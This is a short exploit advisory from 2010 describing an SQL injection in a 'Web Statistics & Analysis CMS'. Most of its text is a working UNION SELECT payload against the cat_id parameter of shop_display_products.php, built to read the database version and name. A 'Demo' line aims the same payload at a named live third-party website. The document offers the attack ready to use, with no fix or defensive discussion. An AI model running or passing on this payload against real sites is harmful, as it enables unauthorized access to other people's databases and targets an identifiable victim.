In The Name Of GOD [+] Exploit Title: Web Statistics & Analysis CMS SQL Injection Vulnerability [+] Date: 2010-11-14 [+] Author : Cru3l.b0y [+] Software Link: http://techscape.co.id/market/ [+] Contact : Cru3l.b0y@gmail.com [+] Website : WwW.PenTesters.IR [+] Greeting: Behzad, Ahmad, ... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Exploit : http://target/path/shop_display_products.php?cat_id=-1+union+select+concat(version(),0x3a,database()),2,3,4,5,6,7,8-- [+] Demo: http://www.agrifam.com/shop_display_products.php?cat_id=-1+union+select+concat(version(),0x3a,database()),2,3,4,5,6,7,8--